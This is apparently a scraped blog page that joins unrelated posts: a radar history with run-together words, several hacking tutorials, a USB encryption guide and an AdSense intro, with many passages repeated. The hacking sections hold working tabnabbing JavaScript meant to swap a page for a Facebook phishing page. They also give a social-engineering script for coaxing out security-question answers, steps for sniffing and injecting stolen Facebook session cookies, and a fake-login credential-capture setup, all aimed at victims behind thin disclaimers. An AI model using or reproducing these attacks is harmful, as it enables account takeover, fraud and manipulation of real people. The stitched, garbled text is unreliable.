22 Apr 2013
HISTORY OF RADAR
HISTORY OF RADAR
OBJECTIVE:Tostudythehistoryoftheevolutionofradarsystems to getsomeideaaboutthismarvel.
HISTORYOFRADAR:
Severalinventors, scientists,andengineerscontributedtothedevelopmentofradar. As earlyas 1886,HeinrichHertzshowedthatradiowaves couldbe reflectedfrom solidobjects.In1895AlexanderPopov,aphysicsinstructorattheImperial Russian Navy schoolinKronstadt, developedanapparatus usingacoherertubefordetecting distantlightningstrikes.Thenextyear,headdedaspark-gaptransmitter.
BEGINNINGOF RADAR:
During1897,whiletestingthisincommunicatingbetweentwoshipsintheBaltic
Sea,hetooknoteofaninterferencebeatcausedbythepassageofathirdvessel.Inhis report, Popovwrotethatthis phenomenonmightbeusedfordetectingobjects,buthe didnothingmorewiththis observation.
TheGermanChristianHülsmeyerwas thefirsttouse radiowaves todetect"the presenceofdistantmetallicobjects".In1904hedemonstratedthefeasibilityof detectingashipindensefog,butnotits distance.He receivedReichpatentNr.
165546forhis detectiondeviceinApril1904,andlaterpatent169154fora related amendmentforalsodeterminingthe distance tothe ship.He alsoreceiveda British patentonSeptember23,1904forthefirstfull Radarapplication, whichhe
calledtelemobiloscope.
RADARTODAY:
Airsurveillanceis carriedouttoday,insystemsotherthanAegis andPatriot, with mechanicallyrotatingantennas.Two-dimensional(2-D)radarsforbothmilitaryand civilsystems useparabolic reflectors atL-bandandabove,orwitharrays ofdipoleor YagielementsintheVHFandUHFbands (seeFigure1).Powertubes (magnetrons, crossed-fieldamplifiers,orklystrons)predominateinthetransmitters,as theydidin
1980.Afewsystemshavemadethetransitiontomultiplesolid-statesourcesthatare combinedinanRFnetworkfor applicationtotheduplexer andantenna.
Three-dimensional(3-D)radarsuseavarietyofantennatypes,mostbasedonplanar
arraysbutalsoincludingtheuniquearray-fedreflectorofthesolid-stateARSR-4 radar. 3-
Doperation,orscannedelectronicallyinelevat ionby phaseshiftersorfrequency- scannetworks
(andsometimesboth). Slotted-waveguidearrays havebeendesignedas ultra-low
sidelobeantennas(ULSA)reducingvulnerabilityto ECM and,as intheE-
3AWACSradar,reducingthespectralspreadingofgroundclutterreturn.Power tubes predominateas
RFpowersources forthese radars as well.
HOWRADARWORKS:
Thebasicideabehindradarisverysimple:asignalis transmitted,itbounces offan objectanditislaterreceivedbysometypeofreceiver. Thisislikethetypeofthing thathappens whensoundecho's offawall.
BasicRADARSystem:
Abasic radarsystemis spiltupintoatransmitter,switch,antenna,receiver,data recorder, processorandsomesortofoutputdisplay. Everythingstarts withthe transmitteras ittransmits ahighpowerpulsetoaswitchwhichthendirectsthepulse tobetransmittedoutanantenna. Justaftertheantennaisfinishedtransmittingthe pulse, theswitchswitches controltothe receiverwhichallows theantennatoreceive
echoed signals. Oncethesignalsare receivedtheswitchthentransfers controlbackto thetransmittertotransmitanothersignal. Theswitchmaytogglecontrolbetweenthe transmitterandthe receiverasmuchas 1000timespersecond.
Anyreceived signalsfromthe receiverarethensenttoadatarecorderfor storageonadiskortape. Laterthedatamustbeprocessedtobeinterpretedinto something.
What is Tabnabbing ?
Hey friends,It's Chris Defaulter Valentine.An Microsoft
Certified Systems Engineer (MCSE),Internet Marketer IIT hacker I Have 10 Years'
Experience Circumventing Information Security Measures And Can Report That I've
Successfully Compromised All Systems That I Targeted For Unauthorized Access
Except One. I Have Two Years' Experience As a Private Investigator, And My
Responsibilities Included Finding People And Their Money, Primarily Using
Social Engineering Techniques. today i am going to How to Hack emails, social
networking websites and other websites involving login information. The technique
that i am going to teach you today is Advanced Tabnabbing. I have already
explained what is basic tabnabbing today we will extend our knowledge base, i
will explain things with practical example. So lets learn..
1. A hacker say(me Chris) customizes current webpage by editing/adding some new parameters and variables.( check the code below for details)
2. I sends a copy of this web page to victim whose account or whatever i want to hack.
3. Now when user opens that link, a webpage similar to this one will open in iframe containing the real page with the help of java script.
4. The user will be able to browse the website like the original one, like forward backward and can navigate through pages.
5. Now if victim left the new webpage open for certain period of time, the tab or website will change to Phish Page or simply called fake page which will look absolutely similarly to original one.
6. Now when user enter his/her credentials (username/password), he is entering that in Fake page and got trapped in our net that i have laid down to hack him.
Here end's the attack scenario for advanced tabnabbing.
Before coding Part lets first share tips to protect yourself from this kind of attack because its completely undetectable and you will never be able to know that your account is got hacked or got compromised. So first learn how to protect our-self from Advanced Tabnabbing.
Follow below measure to protect yourself from Tabnabbing:
1. Always use anti-java script plugin's in your web browser that stops execution of malicious javascripts. For example: Noscript for Firefox etc.
2. If you notice any suspicious things happening, then first of all verify the URL in the address bar.
3. If you receive any link in the Email or chat message, never directly click on it. Always prefer to type it manually in address bar to open it, this may cost you some manual work or time but it will protect you from hidden malicious URL's.
4. Best way is to use any good web security toolbar like AVG web toolbar or Norton web security toolbar to protect yourself from such attacks.
5. If you use ideveloper or Firebug, then verify the headers by yourself if you find something suspicious.
That ends our security Part. Here ends my ethical hacker duty to notify all users about the attack. Now lets start the real stuff..
Note: Aza Raskin was the first person to propose the technique of tabnabbing and still we follow the same concept. I will just extend his concept to next level.
First sample code for doing tabnabbing with the help of iframes:
1. A hacker say(me Chris) customizes current webpage by editing/adding some new parameters and variables.( check the code below for details)
2. I sends a copy of this web page to victim whose account or whatever i want to hack.
3. Now when user opens that link, a webpage similar to this one will open in iframe containing the real page with the help of java script.
4. The user will be able to browse the website like the original one, like forward backward and can navigate through pages.
5. Now if victim left the new webpage open for certain period of time, the tab or website will change to Phish Page or simply called fake page which will look absolutely similarly to original one.
6. Now when user enter his/her credentials (username/password), he is entering that in Fake page and got trapped in our net that i have laid down to hack him.
Here end's the attack scenario for advanced tabnabbing.
Before coding Part lets first share tips to protect yourself from this kind of attack because its completely undetectable and you will never be able to know that your account is got hacked or got compromised. So first learn how to protect our-self from Advanced Tabnabbing.
Follow below measure to protect yourself from Tabnabbing:
1. Always use anti-java script plugin's in your web browser that stops execution of malicious javascripts. For example: Noscript for Firefox etc.
2. If you notice any suspicious things happening, then first of all verify the URL in the address bar.
3. If you receive any link in the Email or chat message, never directly click on it. Always prefer to type it manually in address bar to open it, this may cost you some manual work or time but it will protect you from hidden malicious URL's.
4. Best way is to use any good web security toolbar like AVG web toolbar or Norton web security toolbar to protect yourself from such attacks.
5. If you use ideveloper or Firebug, then verify the headers by yourself if you find something suspicious.
That ends our security Part. Here ends my ethical hacker duty to notify all users about the attack. Now lets start the real stuff..
Note: Aza Raskin was the first person to propose the technique of tabnabbing and still we follow the same concept. I will just extend his concept to next level.
First sample code for doing tabnabbing with the help of iframes:
<!--
Title: Advanced Tabnabbing using IFRAMES and Java script
Author: Chris Defaulter Valentine ( Anonymous )
Title: Advanced Tabnabbing using IFRAMES and Java script
Author: Chris Defaulter Valentine ( Anonymous )
-->
<html>
<head><title></title></head>
<style type="text/css">
html {overflow: auto;}
html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}
iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}
</style>
<body>
<script type="text/javascript">
//----------Set Script Options--------------
var REAL_PAGE_URL = "http://www.google.com/"; //This is the "Real" page that is shown when the user first views this page
var REAL_PAGE_TITLE = "Google"; //This sets the title of the "Real Page"
var FAKE_PAGE_URL = "http://www.hackingloops.com"; //Set this to the url of the fake page
var FAKE_PAGE_TITLE = "HackingLoops| Next Generation Hackers Portal"; //This sets the title of the fake page
var REAL_FAVICON = "http://www.google.com/favicon.ico"; //This sets the favicon. It will not switch or clear the "Real" favicon in IE.
var FAKE_FAVICON = "http://www.hackingloops.com/favicon.ico"; //Set's the fake favicon.
var TIME_TO_SWITCH_IE = "4000"; //Time before switch in Internet Explorer (after tab changes to fake tab).
var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before switching .
//---------------End Options-----------------
var TIMER = null;
var SWITCHED = "false";
//Find Browser Type
var BROWSER_TYPE = "";
if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){
BROWSER_TYPE = "Internet Explorer";
}
//Set REAL_PAGE_TITLE
document.title=REAL_PAGE_TITLE;
//Set FAVICON
if(REAL_FAVICON){
var link = document.createElement('link');
link.type = 'image/x-icon';
link.rel = 'shortcut icon';
link.href = REAL_FAVICON;
document.getElementsByTagName('head')[0].appendChild(link);
}
//Create our iframe (tabnab)
var el_tabnab = document.createElement("iframe");
el_tabnab.id="tabnab";
el_tabnab.name="tabnab";
document.body.appendChild(el_tabnab);
el_tabnab.setAttribute('src', REAL_PAGE_URL);
//Focus on the iframe (just in case the user doesn't click on it)
el_tabnab.focus();
//Wait to nab the tab!
if(BROWSER_TYPE=="Internet Explorer"){ //To unblur the tab changes in Internet Web browser
el_tabnab.onblur = function(){
TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
}
el_tabnab.onfocus= function(){
if(TIMER) clearTimeout(TIMER);
}
} else {
setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
}
function TabNabIt(){
if(SWITCHED == "false"){
//Redirect the iframe to FAKE_PAGE_URL
el_tabnab.src=FAKE_PAGE_URL;
//Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON
if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;
//Change the favicon -- This doesn't seem to work in IE
if(BROWSER_TYPE != "Internet Explorer"){
var links = document.getElementsByTagName("head")[0].getElementsByTagName("link");
for (var i=0; i<links.length; i++) {
var looplink = links[i];
if (looplink.type=="image/x-icon" && looplink.rel=="shortcut icon") {
document.getElementsByTagName("head")[0].removeChild(looplink);
}
}
var link = document.createElement("link");
link.type = "image/x-icon";
link.rel = "shortcut icon";
link.href = FAKE_FAVICON;
document.getElementsByTagName("head")[0].appendChild(link);
}
}
}
</script>
</body>
</html>
<html>
<head><title></title></head>
<style type="text/css">
html {overflow: auto;}
html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}
iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}
</style>
<body>
<script type="text/javascript">
//----------Set Script Options--------------
var REAL_PAGE_URL = "http://www.google.com/"; //This is the "Real" page that is shown when the user first views this page
var REAL_PAGE_TITLE = "Google"; //This sets the title of the "Real Page"
var FAKE_PAGE_URL = "http://www.hackingloops.com"; //Set this to the url of the fake page
var FAKE_PAGE_TITLE = "HackingLoops| Next Generation Hackers Portal"; //This sets the title of the fake page
var REAL_FAVICON = "http://www.google.com/favicon.ico"; //This sets the favicon. It will not switch or clear the "Real" favicon in IE.
var FAKE_FAVICON = "http://www.hackingloops.com/favicon.ico"; //Set's the fake favicon.
var TIME_TO_SWITCH_IE = "4000"; //Time before switch in Internet Explorer (after tab changes to fake tab).
var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before switching .
//---------------End Options-----------------
var TIMER = null;
var SWITCHED = "false";
//Find Browser Type
var BROWSER_TYPE = "";
if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){
BROWSER_TYPE = "Internet Explorer";
}
//Set REAL_PAGE_TITLE
document.title=REAL_PAGE_TITLE;
//Set FAVICON
if(REAL_FAVICON){
var link = document.createElement('link');
link.type = 'image/x-icon';
link.rel = 'shortcut icon';
link.href = REAL_FAVICON;
document.getElementsByTagName('head')[0].appendChild(link);
}
//Create our iframe (tabnab)
var el_tabnab = document.createElement("iframe");
el_tabnab.id="tabnab";
el_tabnab.name="tabnab";
document.body.appendChild(el_tabnab);
el_tabnab.setAttribute('src', REAL_PAGE_URL);
//Focus on the iframe (just in case the user doesn't click on it)
el_tabnab.focus();
//Wait to nab the tab!
if(BROWSER_TYPE=="Internet Explorer"){ //To unblur the tab changes in Internet Web browser
el_tabnab.onblur = function(){
TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
}
el_tabnab.onfocus= function(){
if(TIMER) clearTimeout(TIMER);
}
} else {
setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
}
function TabNabIt(){
if(SWITCHED == "false"){
//Redirect the iframe to FAKE_PAGE_URL
el_tabnab.src=FAKE_PAGE_URL;
//Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON
if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;
//Change the favicon -- This doesn't seem to work in IE
if(BROWSER_TYPE != "Internet Explorer"){
var links = document.getElementsByTagName("head")[0].getElementsByTagName("link");
for (var i=0; i<links.length; i++) {
var looplink = links[i];
if (looplink.type=="image/x-icon" && looplink.rel=="shortcut icon") {
document.getElementsByTagName("head")[0].removeChild(looplink);
}
}
var link = document.createElement("link");
link.type = "image/x-icon";
link.rel = "shortcut icon";
link.href = FAKE_FAVICON;
document.getElementsByTagName("head")[0].appendChild(link);
}
}
}
</script>
</body>
</html>
Now what you need to replace in this code to make it working say for Facebook:
1. REAL_PAGE_URL : www.facebook.com
2. REAL_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL
4. FAKE_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
5. REAL_FAVICON : www.facebook.com/favicon.ico
6. FAKE_FAVICON : Your Fake Page URL/favicon.ico ( Note: Its better to upload the facebook favicon, it will make it more undetectable)
7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes.
8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch.
9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original 'real' page or some other Page.
Now as i have explained earlier you can use this technique to hack anything like email accounts, Facebook or any other social networking website. What you need to do is that just edit the above mentioned 9 fields and save it as anyname.htm and upload it any free web hosting website along with favicon file and send the link to user in form of email or chat message ( hidden using href keyword in html or spoofed using some other technique).
That's all for today. I hope you all enjoyed some advanced stuff. If you have any doubts or queries ask me in form of comments.
A comment of appreciation will do the work..
Note: This tutorial is only for Educational
Purposes, I did not take any responsibility of any misuse, you will be solely
responsible for any misuse that you do. Hacking email accounts is criminal
activity and is punishable under cyber crime and you may get upto 40 years of
imprisonment, if got caught in doing so.
What is Social Engineering Attack ?
I myself have had a few people in
the past ask me questions on social engineering. I always say to anyone, you
need to imagine social engineering as a game. But before i talk about the 'Game',
I want to go into detail about Basic knowledge and self preparation.
Basic knowledge and self preparation:
It's important like most things in life to be fully equipped and prepared to take on a task. I myself would suggest you have clear outlines of what your trying to achieve, be it to get someone's email password, exploiting them for money, to get into a online game group/clan etc etc. In this case the email and password of Facebook account.
First of all, you need to take into consideration of what you will need, for this social engineering tutorial i'm going to outline this from an obtaining someone's email password perspective. Before i continue, i would like to stress some important factors you might want to take into consideration:
1) People are more open to you if they perceive you as an idiot.
2) People are less suspicious of you when you make them laugh.
3) People are more trusting if you actually take an interest in them.
I'm going to break these three points down to give you a better understanding of why this is:
In the case of 1 - nearly everyone seems to be more careless when they perceive you as an idiot, the main reason for that is, you don't consider someone who appears to be an idiot as a threat. Another reason is that people tend to become more open and arrogant when they feel they are on a higher pedistel than you (never forget that!). Now there are things you need to remember however, although these things are true if you overplay your idiot persona it will not be good in your fortune. Always remember real morons are annoying as hell, you DO NOT want to put off the person your trying to social engineer(unless your trying to fail, then knock yourself out).
In the case of 2 - when talking to someone it's easy to see why this rule is advised. Often it's a good ice breaker, also reinforcing the idea that "your a nice guy", it slowly allows the person to build a relationship of 'trust' with you.
in the case of 3 - also an obvious advisement, if you just pester someone for information without at-least pretending to take an interest in what they are saying, not only will you come across as rude, it will make the person wonder why your probing them for person info.
Basic knowledge and self preparation:
It's important like most things in life to be fully equipped and prepared to take on a task. I myself would suggest you have clear outlines of what your trying to achieve, be it to get someone's email password, exploiting them for money, to get into a online game group/clan etc etc. In this case the email and password of Facebook account.
First of all, you need to take into consideration of what you will need, for this social engineering tutorial i'm going to outline this from an obtaining someone's email password perspective. Before i continue, i would like to stress some important factors you might want to take into consideration:
1) People are more open to you if they perceive you as an idiot.
2) People are less suspicious of you when you make them laugh.
3) People are more trusting if you actually take an interest in them.
I'm going to break these three points down to give you a better understanding of why this is:
In the case of 1 - nearly everyone seems to be more careless when they perceive you as an idiot, the main reason for that is, you don't consider someone who appears to be an idiot as a threat. Another reason is that people tend to become more open and arrogant when they feel they are on a higher pedistel than you (never forget that!). Now there are things you need to remember however, although these things are true if you overplay your idiot persona it will not be good in your fortune. Always remember real morons are annoying as hell, you DO NOT want to put off the person your trying to social engineer(unless your trying to fail, then knock yourself out).
In the case of 2 - when talking to someone it's easy to see why this rule is advised. Often it's a good ice breaker, also reinforcing the idea that "your a nice guy", it slowly allows the person to build a relationship of 'trust' with you.
in the case of 3 - also an obvious advisement, if you just pester someone for information without at-least pretending to take an interest in what they are saying, not only will you come across as rude, it will make the person wonder why your probing them for person info.
With these three points made, i will now continue with my example of obtaining someone's Facebook Email and password. Before you go into detail, it's important to outline what you need to successfully social engineer the password out of someone. Now you could try to Social engineer them for their password, I advise you be a bit more intelligent and indirectly social engineer them for their password by obtaining their password recovery knowledge. Now it's important to what you need to successfully hack their account through recovery questions. You will need the following:
With this in mind it's imperative you plan how you will obtain these details. I will tell you how i do it. But first i need you to understand, this whole transaction will not be completed over a course of a day, it can take days to weeks depending on the person. I suggest you talk to them and read them first. If their open, then you can do it within days, if their not then it would be better you spread this out over a week or two. I also want you to imagine what you will say, try to predict their answers and MOST OF ALL, think of a scapegoat on why your probing them for these answers, just in case your less than suttle and arouse suspicion, if they ever suspect you it will go from a flame to a fire it's important to stamp all of their doubt in you as soon as possible.
Now there are many ways you can obtain their password and addressee. Some people and post their address on their profiles. In which case this is easy pickings, however that is rare. So you need to devise a way of obtaining that info. Now you can pretend that you are from bank or something like this and ask for their email address. Or you can pretend that you are some student an doing some research. Be creative
Now i need the answer to their security question, now you need to find out what the question is, i suggest pretend to recover password to see what it is or get the info for all of the recovery questions email asks. Im going to go with the first option and say for example their recovery question was : What is your dogs name?.
How I would go about obtaining this would be to pretend to have a pet of my own, i would start off the convo like so:
me: Ffs my dog wont stop barking, seriously where did i leave my ducktape lol!
victim: lol yeah i know sometimes my dog's the same, annoying -.-
me: Oh you have a dog? i didn't realize whats your dogs name, if you don't mind me asking.
It is important to add "if you don't mind me asking", because it gives the person a bit of power over you and also show's a little respect (once again reinforcing the notion your a nice fellow).
POINT: I wouldn't dive straight into "whats your dogs name" start with the breed first and remember try to predict what they will inturn ask (mines blah blah whats yours?).
With that in mind, I'm sure by now you can see how easy it is, to social engineer someone's password through the indirect method of password recovery. Now obviously most recovery questions wont be about pets mostly they're "mothers maiden name" "place of birth" etc. But use the same logic and work around it, remember think every detail through and ask yourself this if someone gave you this story or asked you in a certain way would it seem legit to you?
and when you have the email address, click on Facebook, I forgot password and will be sent on your email.
The Game:
The game is basically, perfecting "self preparation". Social engineering is a game,. If you think about it in this way: each time trust is given to you, you advance a level, which each level you advance, your ability of obtaining information from this person becomes easier. In a sense mastering the ability to come up with more ingenious ways of manipulating someone, without arousing suspicion, is what separates the lucky noobs from the elites.
When thinking about this as a game, you need to reflect on your goals. As I've mentioned before try to imagine the dialogue between you both, think about how you will obtain certain things and more importantly have clear directives. With this in mind i think we can now talk about how you might want to consider presenting yourself (only applies if the person is indeed a stranger).
So if you were going to go after a complete stranger, you should first try and get as much research on them as you can. For example, age, name. This is important for making up for fake identity. I would also suggest if you social engineer more than one person you write down, in detail! your differn't alias so you don't get confused. Nothing would be worse than using the wrong alias on the wrong person.
When building your identity decide on what would give you the biggest advantage with this person. This can be from faking your age to match the interests of this person, thus giving you the advantage of being able to "click" with the person. Pretending to be a student or in a dead end job for sympathy manipulation or in the case of a dead end job, pretending to relate to the slave. There are many things you can do, as I've mentioned it depends on the circumstances you need.
Social Engineering The Art of Human Hacking ?
Note:
This tutorial is only for Educational Purposes, I did not take any responsibility
of any misuse, you will be solely responsible for any misuse that you do.
Hacking email accounts is criminal activity and is punishable under cyber crime
and you may get upto 40 years of imprisonment, if got caught in doing so.
What is Session Hijacking Attack ?
What Is Session Hijacking Attack ?
Session hijacking, also known as TCP session hijacking, is a
method of taking over a Web user session by surreptitiously obtaining the
session ID and masquerading as the authorized user. Once the user's session ID
has been accessed (through session prediction), the attacker can masquerade as
that user and do anything the user is authorized to do on the network.
The session ID is normally stored within a cookie or URL. For most communications, authentication procedures are carried out at set up. Session hijacking takes advantage of that practice by intruding in real time, during a session. The intrusion may or may not be detectable, depending on the user's level of technical knowledge and the nature of the attack. If a Web site does not respond in the normal or expected way to user input or stops responding altogether for an unknown reason, session hijacking is a possible cause.
The session ID is normally stored within a cookie or URL. For most communications, authentication procedures are carried out at set up. Session hijacking takes advantage of that practice by intruding in real time, during a session. The intrusion may or may not be detectable, depending on the user's level of technical knowledge and the nature of the attack. If a Web site does not respond in the normal or expected way to user input or stops responding altogether for an unknown reason, session hijacking is a possible cause.
Step By Step Explanation Of How To Carry Out This Attack ?
First of all, you would need to connect to an unsecured wireless connection that others are using. Then we start capturing packets transferred over this network. Note that your wireless adapter needs to support monitor mode to scan all packets transferred over a network. you can check your wi-fi card specifications to see if it supports monitor mode.
We would then need to use a network sniffing tool so sniff packets transferred over the network. In this case, I am using a tool called Wireshark (Download From Here). Within wireshark, there is a menu called "Capture"; Under the capture menu, select interfaces from that menu, and a list of your interfaces will come up.
Next you select Start Next to the interface that you have enabled monitor mode
on. most times it is the interface that is capturing the most packets. In my
case, Microsoft interface is capturing the most packets, so i will select to
start capturing with the microsoft interface. You would leave wireshark to
capture packets for a couple of seconds depending on the amount of persons
currently using the network. Say 30 seconds if 10 people currently are using
the network, or 30 minutes if there is barely network activity going on. While
capturing, wireshark will look something like this.
After capturing a certain amount of packets, or running the
capture for a certain amount of time, stop it by clicking on the stop current
capture button.
After stopping the capture, you will need to look for the user's
facebook session cookie which, hopefully was transferred in one of the packets
captured. to find this cookie, use the wireshark search which can be found by
pressing "ctrl + f" on your keyboard. In this search interface,
select Find: By "String"; Search In: "Packet Details". and
Filter by the string "Cookie".
When you press find, if there is a cookie, this search will find it, if no
cookie was captured, you will have to start back at step 2. However, if youre
lucky and some cookies we're captured, when you search for cookie, your
interface will come up looking like this in the diagram below. You would notice
the cookie next to the arrow contains lots of data, to get the data. the next
thing you do is to right click on the cookie and click copy->description.
After copying the description, paste it in a text file, and
separate each variable to a new line (note the end of every variable is
depicted by a semicolon eg - c_user=100002316516702;). After some research
and experimenting, i figured out that facebook authenticated the user session
by 2 cookies called c_user and xs. Therefore you will only need the values of
these cookies, and then need to inject them into your browser. Before injecting
the cookies, here is what my facebook page looked like:
The next thing you would need to do is to inject this
information as your own cookie. so firstly you would need to install a cookie
manager extension for your browser, I'm using firefox Cookie Manager. After
installing this extension, you will find it under Tools->cookie manager. The
interface for cookie manager looks like this:
The first thing we would need to do is to clear all cookies,
so clear all the cookies you currently have. Then select the "Add
Cookie" link to add a new cookie. The first cookie you will add is the
c_user cookie which will have the following information:: Domain -
".facebook.com", name-"c_user", value-"the value you
copied earlier from the wireshark scanning" and the Path-"/";
leave the isSecure and Expires On values to default:
The next thing you do is to hit the "Add" button and the cookie
is saved. Repeat the same steps to add the xs cookie with all of the same
information, except the value, which would be the xs value you have.
After adding these 2 cookies, just go to facebook.com, refresh the page and...
Boom!! you will see you are logged in as that user whose cookie information you
stole. Here is my facebook page after i injected those cookies:
Note:
This tutorial is only for Educational Purposes, I did not take any
responsibility of any misuse, you will be solely responsible for any misuse
that you do. Hacking email accounts is criminal activity and is punishable
under cyber crime and you may get upto 40 years of imprisonment, if got caught
in doing so.
Phishing Attack
Phishing - is an e-mail fraud method in which the perpetrator sends out legitimate-looking email in an attempt to gather personal and financial information from recipients. Typically, the messages appear to come from well known and trustworthy Web sites. Web sites that are frequently spoofed by phishers include PayPal, eBay, MSN, Yahoo, BestBuy, and America Online. A phishing expedition, like the fishing expedition it's named for, is a speculative venture: the phisher puts the lure hoping to fool at least a few of the prey that encounter the bait.
1. First a fall you need a fake login page for facebook (fake.html),and a Php script to redirect and capture the victims passwords (login.php)
2. Download Here - Click Me
Password - @hackaholic
After you download the
files, Open login.php,with a note pad and search for the term
www.enteryoursite.com and replace it with the site address where you want the
victim to be redirected ,finally save it.
Note
: This a very important step redirect
the victim to a proper site other wise the victim will get suspicious .In our
case we are making fake face book
login page so its better to redirect the victim to www.facebook.com/careers
4. Now create an account at Free web hosting site like 110mb.com , T35.com or ripway.com
5. Now upload both the files (fake.html , login.php ) to your hosting account and send the fake.html(fake facbook login page) link to your victim
Example:-
www.yoursite.110 mb.com/fake.html
6. Now when the victim enters all his credentials, like login name and password in our fake login page and when he clicks login He will be redirected to site which we did in step 3
7. Now to see the victims id ,password, login to your hosting account "110mb.com " where you will see a new file "log.txt" .Open it to see the victims user id and the password
Note:- If your still confused, you can watch my video on Hack a
Facebook Account Using a Fake login Page
This is a simple but a very effective method to Hack face book accounts .If you have any doubts please feel free to comment !!
This is a simple but a very effective method to Hack face book accounts .If you have any doubts please feel free to comment !!
Note:
This tutorial is only for Educational Purposes, I did not take any
responsibility of any misuse, you will be solely responsible for any misuse
that you do. Hacking email accounts is criminal activity and is punishable
under cyber crime and you may get upto 40 years of imprisonment, if got caught
in doing so.
How to Password Protect Your USB Drive ?
There aren't too many things that
upset me. One item that does is people who put personal data on their thumb
drives without password protection. They are just waiting for a disaster as
sooner or later that USB flash drive will vanish. The question is who will get
the data next? If you don't want to spend money for a secure flash drive, then
we've got a free encryption utility you should use called Cryptainer LE.
As a bonus, it even works on your desktop or notebook.
Too often we focus on the
convenience of USB drives and not the importance of the data. We treat them
like the old floppy disks. No passwords and no encryption. Unlike the old
floppies, people are able to put large quantities of personal data on these
removable drives. I've seen unprotected items ranging from QuickBooks files to
online passwords with lots in between.
There are different ways that you
can protect your data. Previously, we wrote about biometric USB drives which
offer a high degree of security for a high price. This time around, we thought
we would find a free utility that could password protect and encrypt our USB
drive. We found one called Cryptainer LE from Cypherix.
Cryptainer
LE
Cryptainer LE is part of a suite of
security products offered by the company that works on Windows. The LE product
is their free version which offers some compelling features such as:
- Disk encryption for files and folders (Blowfish
algorithm)
- Creation of secure email attachments
- Virtual drive that appears in Windows Explorer
- Passwords from 8 to 100 characters
The other item that distinguishes
Cryptainer LE is that it has a component that can be loaded on to USB drives
called Cryptainer Mobile. This means you can carry your data on the
thumb drive without needing a program on the host computer to decrypt. The one
caveat is this doesn't work with Windows 98 and Windows ME since those
operating systems don't auto load USB drivers.
Encrypted
Volumes
The program works by creating a
volume where you drag and drop the files and folders you wish to protect. Each
volume has its own password. You might think of the volume as a vault of a set
size you determine. The volumes have a .cry file extension and can be as large
as 25mbs in the free version. You can create as many volumes as needed.
If you view the files on your USB
drive in Windows Explorer, you see 3 types of items:
CrpytainerMobileFiles folder this folder contains the program files. The contents are
not encrypted. If you delete the folder your volumes still exists, but you'll
need to reinstall the software.
Cryptainermobile.exe this is the program you use to encrypt and decrypt vaults
on your USB drive.
.cry files these are your volumes and contain the files and folders
you've encrypted. You'll notice that you can't tell what's contained in the
vault.
If someone were to find your thumb
drive and open one of these volumes with the .cry extension, the data would be
meaningless. The screen shot below shows how one of my vaults looks in a
program editor. I can't figure it out and I wrote the article.
Decrypting
the Volumes
To see and use the contents of a
volume, you need to load and decrypt it using the volume's password you set
with Cryptainermobile.exe. The process is fast, but varies on the size of the
file.
Once the volume is decrypted, you
can work with it as normal. You may also view it as a drive using Windows
Explorer. In the example below, I've loaded my vault1.cry as Drive: J. At this
stage, you can also see the assigned volume name (1) WEBSITE, which is more
meaningful than vault1.cry. On the right side are the two files. I can now work
with these files as normal until I unload the volume. For example, to add more
files to the volume, I can drag and drop them from my desktop into the volume.
Installing
Cryptainer LE
To get the mobile version on your thumb
driver, you need to first install the Cryptainer LE program to your computer.
Even though I'm highlighting the Cryptainer Mobile, it is part of the bigger
program. The benefit is that you can use the same protection on your computer
folders and files.
One item that people may skip during
the installation process is the program's end user license agreement. You would
be wise to give it a look as it has clear language that states you're out of
luck if you lose your password. The company can't retrieve your data and it
will stay encrypted until you remember it. Use caution when setting your
password(s) as you want one that protects your data, but not one people could
easily guess.
Creating
a Volume
During the computer installation,
you'll be asked to create a volume. This is where you define the size and
provide a meaningful name. The first volume you create becomes the primary
volume which means it displays by default after you enter your password.
The dialog will set certain values
set such as file location and size, but you can easily change these. The
maximum volume size is 25 MB. This is a limitation of the free version, but you
can create multiple volumes on a drive. It's important to note that this space
is allocated immediately and not based on when you add files. If you don't plan
on using the desktop version, you might want to create a smaller volume. After
retyping your password, click Proceed to Create Volume.
Installing
Cryptainer Mobile
With the desktop version installed,
you can add the mobile component. This is done by clicking the triangular icon
and opening Cryptainer LE. On the Tools menu, there is a menu item for Install
Cryptainer Mobile
The mobile program files will be
copied to your USB drive. To start the mobile version, you need to close the
desktop version. The process for creating volumes on the USB drive is the same
as on the desktop.
The hardest part in this whole
process is deciding on the correct password to use. Although the mobile
installation is a two-step process, it won't take long. From there, it's a
simple matter of opening the program and dropping whatever files you wish to
protect in your vault. As long as you have the volume loaded, you can use your
data in a normal fashion. Once you pull the thumb drive out, the volume unloads
and the files can't be opened or viewed without the password.
One item to remember is if you use
the desktop version and drag and drop files, you're copying files to the new
volume. In other words, if I create a volume on my desktop which is assigned
Drive E: and I drop a folder from My Documents into that vault, I have two
copies on my computer. One is the original in My Documents and the other is the
copy I placed in the vault.
Initially, I thought the 25MB size
volume restriction would be an issue for me. Instead, I've found I prefer
having multiple volumes based on the nature of the data. You also have the
option of upgrading the program for a small fee which removes this restriction
and adds more standardized methods of encryption.
I would definitely give the program
a try if you have sensitive data on a removable USB drive. This program will
put your mind at ease and protect your data in the event the drive is lost or
stolen.
How To Start a Google AdSense Account and Make Money Blogging
How To Start a Google AdSense Account and Make
Money Blogging
Starting a new account with Google AdSense is one of the
easiest ways to start monetizing
your blog. While Google AdSense might not make you rich, it's a simple and
useful tool. In fact, it's usually the first step bloggers typically take to
earn an income from their blogs because it is so easy to get started.
